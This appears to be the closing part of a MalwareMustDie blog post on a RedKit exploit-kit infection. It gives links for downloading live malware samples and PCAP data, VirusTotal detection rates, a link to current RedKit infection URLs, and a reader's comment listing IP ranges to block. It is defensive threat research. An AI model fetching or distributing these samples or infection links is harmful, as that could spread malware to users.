Here's the full sample of this infection: samples can be downloaded here -->>[MEDIAFIRE] PCAP & Regshot data can be downloaded here -->>[MEDIAFIRE] Detection rates are as follows (click the numbers in front for the link):
[1] Landing page VT (2/46) [2] PDF Infector VT (5/46) [3] Payload VT (5/46)
There are huge recent infections of Red Kit, which can be found below, as announced by our fellow crusader (thanks to @Set_Abominae): *) [NEW] CURRENT UrlQuery Link for RedKit -->>[HERE]
#MalwareMustDie

2 comments:

  1. I listed some of the domains here, although my personal recommendation is to block:
    91.243.115.0/24
    46.166.169.0/24
    62.76.184.0/21

    1. Great advice, thank you! And I just read your recommendation < 100% on your side, for what you wrote is a true fact.

      The MMD blog is also being used as evidence of crime, so we write what we can positively prove with malware detail evidence.
      We research, expose infection logic + PoC of crime, and shutdown process < our loops.
      By God's speed, together, we will decrease infectors systematically.
